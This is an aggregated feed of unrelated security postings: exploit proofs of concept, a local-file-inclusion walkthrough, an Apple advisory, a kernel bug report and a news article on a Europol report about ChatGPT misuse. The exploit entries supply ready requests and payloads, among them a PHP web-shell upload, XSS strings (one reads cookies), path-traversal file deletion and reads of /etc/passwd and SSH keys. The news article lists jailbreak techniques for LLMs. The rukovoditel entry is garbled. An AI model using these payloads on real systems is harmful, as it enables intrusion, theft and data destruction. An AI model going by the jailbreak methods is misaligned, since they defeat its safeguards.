rukovoditel version 3.2.1 suffers from a cross site scripting vulnerability.

    ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://www.rukovoditel.net/## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1## Description:The application is vulnerable to DOM-based cross-site scriptingattacks. Data is read from `location.hash` and passed to`jQuery.parseHTML`.The attacker can use this vulnerability to create an unlimited numberof accounts on this system until it crashed.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```POSTGET /rukovoditel/index.php?module=users/restore_password HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63Safari/537.36Connection: closeCache-Control: max-age=0Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;cookie_test=please_accept_for_session;app_login_redirect_to=module%3Ddashboard%2FUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/loginSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)## Proof and Exploit:[href](https://streamable.com/i1qmfk)## Time spent`3:45`

rukovoditel 3.2.1 Cross Site Scripting

iBooking version 1.0.8 suffers from a remote shell upload vulnerability.

    # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload# Exploit Author: d1z1n370/oPty# Date: 01/11/2022# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088# Tested on: Linux# Version: 1.0.8# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.# PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/dashboard/settingsX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062Content-Length: 449Connection: closeCookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="_token"kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="is_modal"1-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="file"; filename="upload.php56"Content-Type: image/gifGIF89a;<?php system($_GET['a']); phpinfo(); ?>-----------------------------115904534120015298741783774062--

iBooking 1.0.8 Remote Shell Upload

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

Moodle LMS version 4.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)# Date: 26/10/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://moodle.org/# Software Link: https://git.in.moodle.com/moodle# Version: 4.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3nozDescription:A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public LicenseVulnerable Code:line 111 in file "course/search.php"echo $courserenderer->search_courses($searchcriteria);Steps to exploit:1) Go to http://localhost/course/search.php2) Insert your payload in the "search"Proof of concept (Poc):The following payload will allow you to run the javascript -"><img src=# onerror=alert(document.cookie)>

Moodle LMS 4.0 Cross Site Scripting

Apple Security Advisory 2023-03-27-5 - macOS Big Sur 11.7.5 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-5 macOS Big Sur 11.7.5

macOS Big Sur 11.7.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213675.

Apple Neural Engine  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher, Antonio Zekic  
(@antoniozekic), and John Aakerblom (@jaakerblom)

AppleMobileFileIntegrity  
Available for: macOS Big Sur  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Big Sur  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Big Sur  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

Carbon Core  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-23534: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Big Sur  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Big Sur  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Find My  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

Foundation  
Available for: macOS Big Sur  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: macOS Big Sur  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

NetworkExtension  
Available for: macOS Big Sur  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-27962: Mickey Jin (@patch1t)

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Big Sur  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Big Sur 11.7.5 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxks0hAAquqDdtX6QvjVigRuSd2bpQny1TxVp62Zo47F9YkrvuvKVvJjaFzQJNjE  
p2Oq3BgNBkUqei26w8GLqwbg8szhCIPCOVHFcGDTPGrf53oWLlPc6WZxn8ihZOo4  
r3rxH4MGFSb+dBwWnF6GVX1EBcVjO08FwOzgNqkh2baqSU0iuxnSRW9XYmzwhG1w  
bj86kfnCooSLJlUTiTbXxN8W/vmfwRWONXQTkkOa47knWSKH9QBzzfAJKbil6sRE  
hDiYdtXUER//PApErvjl5i6b5wRQ0KQ19X//XfZzJtWCPuh0/nw7ducHJg+DpPUc  
EfNINhPKauqUvw516EvDuW0yVIlyMrfNCJOpHwQkmCfqx2i6l1+U5M8yqsyVcpbe  
Nbs6LYMNvDalLnazRRA3oT3036MrnCWem/M1afTrsoHYnhYb8FMx9gI3GV2Swgud  
fJrPttdjtpwlrCF60KsquJEvmcrNFwKk+QKS8Gbe8bbJSPk1AGsHN1JivFNiC036  
fycIK1ffwPHPYJgF6rLCOQ9q+DHRTw+lR0UrGmRplrjVBwt9cdiuLaeJZWPyGMwP  
P5QYlkULAE+5B4HKqzKMFYPkoEMzmvdOsgbhcg7OSmP1PAiAW6m7HnOmDAX7E2El  
03qFLcjb1GxM/U+lKN5Xx4rH+BR0yrEx20oZGX9Vymn7UJVYlDI=  
=xOHM  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-5

MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /database/sqldel.html.

Vulnerability exists in sqldel.html  
1、 We put a txt file in the root of our website with the file name test.txt.  
2、Constructing packets after logging into the backend

    POST /admin.php/database/sqldel.html HTTP/1.1
    Host: test.test
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://test.test
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://test.test/editor/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 19
    
    name=../../test.txt

CVE-2023-27701: MuYucms sqldel.html has Arbitrary file deletion vulnerability · Issue #9 · MuYuCMS/MuYuCMS

amano Xparc parking solutions 7.1.3879 was discovered to be vulnerable to local file inclusion.

**Introduction**

Hello everyone, during one of the penetration testing assessments, we faced Amano Xparc parking solution web application. While conducting the assessment we discovered multiple vulnerabilities and we submitted it to https://cve.mitre.org/. For your reference the links for the other CVEs blogs:

*   **SQL injection CVE-2023–23331:** https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c

Today I will be demonstrating CVE-2023–23330.

**Vulnerability Details**

*   **Vulnerable Software**: Amano Xoffice parking solutions
*   **Vulnerability:** Local File Inclusion
*   **Affected Version:** 7.1 (7.1.3879)
*   **Vendor Homepage:**https://www.amano.eu/en/
*   **CVE:** CVE**\-**2023–23330

**What is Local File Inclusion (LFI)?**

_“Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application”_

_\- OWASP_

To simplify things, LFI is a vulnerability that abuses a flaw when a server tries to include a file. The idea is to let the include unattended files such as system files or non-published documents.

**Why LFI is there? and how to prevent it.**

It occurs due to the use of user input without validation.

Preventing LFI could be done by considering the following:

*   Avoid passing user-submitted input to the system.
*   Whitelist files that can be included.
*   Reject un-defined/Whitelisted document.
*   Do not permit file paths to be appended directly make them hard-coded.
*   Use databases instead of filesystems. Either to store the files in the database or store the file path in the database.

**CVE Demo**

While exploring the website manually, I noticed a page to download the user manual and guide. I intercepted the request in burp so I can use Burp repeater for easier request manipulation. The image below shows the parameter and user manual file:

So, clearly, the “file” parameter in the GET request is responsible for specifying the file name. interesting…

Let’s try to change the file name to “/etc/passwd” which is a default file in Linux/Unix servers and readable by all users. The image below shows the try to inject “/etc/passwd”:

So, it didn’t work directly, as the error shows in the HTTP response the file “../manuals/etc/passwd” was not found.

**No Problem!**

Instead of using the absolute path of “/etc/passwd” we will use the relative path. In file systems to get a file there are two main ways “absolute” or “relative”.

Now let’s fuzz the relative path to know what is the depth of the file. We can use Burp intruder, python scripts, or manually in Burp repeater. The image below shows the first try with a depth of 2 manually in the Burp repeater:

Didn’t work, let’s try depth 3

**It worked!**

We were able to include a file from the system without any validation.

The question now is, how to abuse that?

There are multiple ways to exploit this and gain more. Each case or scenario has its own way to go further. However, I may suggest looking into:

*   **Config files & Source code**: most of the time DB credentials, API tokens …etc. Are stored in clear-text format either in Config files or source code.
*   **Well-Known files**: You may try to access well-known files such as Shadow file, log files, bash history, SSH keys …etc.

For the sake of knowledge, let’s try an example of a source code and SSH key.

SSH key file

Version.php file

****Acknowledgment:****

I would like to thank the teammates: Fahad Almulhim (0xHunter) and Osama Aldosari. Also, many thanks to the Saudi information and technology company — SITE for their continuous support.

**References:**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23330
*   https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c
*   https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/11.1-Testing\_for\_Local\_File\_Inclusion

CVE-2023-23330: Amano Xparc Local File Inclusion (CVE-2023–23330) - Saleh - Medium

MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /accessory/picdel.html.

Vulnerability exists in picdel.html  
1、 We put a txt file in the root of our website with the file name test.txt.  
2、Constructing packets after logging into the backend

    POST /admin.php/accessory/picdel.html HTTP/1.1
    Host: test.test
    Content-Length: 54
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://test.test
    Referer: http://test.test/admin.php/accessory/filelist.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    picdelur=/upload/files/.gitignore/../../../../test.txt

CVE-2023-27700: MuYucms picdel.html has Arbitrary file deletion vulnerability · Issue #8 · MuYuCMS/MuYuCMS

Categories: News
Tags: ChatGPT

Tags:  large language models

Tags:  LLMs

Tags:  jailbreak

Tags:  restrictions

Tags:  impersonating

Tags:  misinformation

Subject matter experts at Europol were asked to explore how criminals can abuse LLMs such as ChatGPT, as well as how they may assist investigators in their daily work



(Read more...)




The post ChatGPT helps both criminals and law enforcement, says Europol report appeared first on Malwarebytes Labs.

In a report, Europol says that ChatGPT and other large language models (LLMs) can help criminals with little technical knowledge to perpetrate criminal activities, but it can also assist law enforcement with investigating and anticipating criminal activities.

The report aims to provide an overview of the key results from a series of expert workshops on potential misuse of ChatGPT held with subject matter experts at Europol. ChatGPT was selected as the LLM to be examined in these workshops because it is the highest-profile and most commonly used LLM currently available to the public. 

These subject matter experts were asked to explore how criminals can abuse LLMs such as ChatGPT, as well as how they may assist investigators in their daily work. While the wide range of collected practical use cases are not exhaustive, they do provide a glimpse of what is possible. The purpose of the exercise was to observe the behavior of an LLM when confronted with criminal and law enforcement use cases.

Currently the publicly available LLMs are restricted. For example, ChatGPT does not answer questions that have been classified as harmful or biased.

But there are other points to consider when interpreting the answers:

*   The training input is dated, the vast majority of ChatGPT’s training data dates back to September 2021.
*   Answers are provided with an expected degree of authority, but while they sound very plausible, they are often inaccurate or wrong. Also, since there are no references included to understand where certain information was taken from, wrong and biased answers may be hard to detect and correct.
*   The questions and the way they are formulated are an important ingredient of the answer. Small changes in the way a question is asked can produce significantly different answers, or lead the model into believing it does not know the answer at all.
*   ChatGPT typically assumes what the user wants to know, instead of asking for further clarifications or input.

But, basically because we are still in early stages of trialing LLMs there are various ways to jailbreak them. A quick roundup of methods to circumvent the built-in restrictions shows that they all boil down to creating a situation where the LLM thinks it’s dealing with a hypothetical question rather than something that it’s not allowed to answer.

*   Have it reword your question in an answer.
*   Make it pretend it’s a persona that is allowed to answer the questions.
*   Break down the main question in small steps which it does not recognize as problematic.
*   Talk about fictional places and characters that are in reality existing situations, but the LLM does not recognize them as such.

So what can LLMs do that could help cybercriminals?

LLMs excel at producing authentic sounding text at speed and scale. Like an excellent actor or impersonator they are able to detect and re-produce language patterns. This ability can be used to facilitate phishing and online fraud, but it can also generally be used to impersonate the style of speech of specific individuals or groups. This capability can be abused at scale to mislead potential victims into placing their trust in the hands of criminals. Potential abuse cases for this ability can be found in the area of terrorism, propaganda, and disinformation.

While on the subject of impersonating, Europol considered a possible integration with other existing AI services, such as deepfakes, which could open up an entirely new dimension of potential misinformation. To counter impersonation, current efforts aimed at detecting text generated by AI-models are ongoing and may be of significant use in this area in the future. At the time of writing the report, however, the accuracy of known detection tools was still very low.

ChatGPT is capable of explaining, producing, and improving code in some of the most common programming languages (Python, Java, C++, JavaScript, PHP, Ruby, HTML, CSS, SQL). Which brings us to worries around malware creation, the safeguards preventing ChatGPT from providing potentially malicious code only work if the model understands what it is doing. If prompts are broken down into individual steps, it is trivial to bypass these safety measures. And newer models will even be better at understanding the context of the code, as well as at correcting error messages and fixing programming mistakes. The worry here is that an advanced user can exploit these improved capabilities to further refine or even automate sophisticated malicious code.

Another worry for the future are what Europol calls “Dark LLMs”, which it defines as LLMs hosted on the Dark Web to provide a chat-bot without any safeguards, as well as LLMs that are trained on particular – perhaps particularly harmful – data. Dark LLMs trained to facilitate harmful output may become a business model for cybercriminals of the future.

> “Law enforcement agencies need to understand this impact on all potentially affected crime areas to be better able to predict, prevent, and investigate different types of criminal abuse.”

The recommendations the report provides are all about better understanding what LLMs are capable of, how they can be used to forward investigations, how their work can be recognized, and how to set up legislation to provide better defined and hard to jailbreak limitations.

The European Union is working on regulating AI systems under the upcoming AI Act. While there have been some suggestions that general purpose AI systems such as ChatGPT should be included as high risk systems, and meet higher regulatory requirements, uncertainty remains as to how this could practically be implemented.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

ChatGPT helps both criminals and law enforcement, says Europol report

A slab-out-of-bound read problem was found in brcmf_get_assoc_ies in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux Kernel. This issue could occur when assoc_info->req_len data is bigger than the size of the buffer, defined as WL_EXTRA_BUF_MAX, leading to a denial of service.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 14 Mar 2023 10:34:35 +0900
From: Jisoo Jang <jisoo.jang@...sei.ac.kr>
To: oss-security@...ts.openwall.com
Cc: Dokyung Song <dokyungs@...sei.ac.kr>, Minsuk Kang <linuxlovemin@...sei.ac.kr>
Subject: Re: A USB-accessible slab-out-of-bounds read in Linux kernel driver

This bug was assigned CVE-2023-1380.Best,
Jisoo

On Mon, Mar 13, 2023 at 8:10 PM Jisoo Jang <jisoo.jang@...sei.ac.kr> wrote:

> === Description ===
>
> A slab-out-of-bounds read bug was found in the Broadcom Full MAC Wi-Fi
> driver (e.g., brcmfmac.ko in the linux-modules-extra package in Ubuntu),
>
> The bug occurs in kmemdup() called from brcmf\_get\_assoc\_ies(), when
> assoc\_info->req\_len, data from a URB provided by a USB device, is bigger
> than the size of buffer which is defined as WL\_EXTRA\_BUF\_MAX.
>
> The driver duplicates the data of cfg->extra\_buf to conn\_info->req\_ie as
> much as assoc\_info->req\_le, which could exceed the size of the buffer.
>
> The data passes through cfg80211\_connect\_done(),
> \_\_cfg80211\_connect\_result(); in the end, it reaches
> nl80211\_send\_connect\_result() that will form netlink messages with the data
> read outside the bounds of the buffer.
>
> This data, which may contain sensitive information in the kernel, could be
> sent to a userspace socket by \_\_netlink\_sendskb() during this multicasting
> process.
>
> === Fix ===
>
> A patch was reported to the linux wireless mailing list and successfully
> reviewed by the maintainer.
>
> (
> https://lore.kernel.org/linux-wireless/20230309104457.22628-1-jisoo.jang@yonsei.ac.kr/T/#u
> )
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

Tag

#php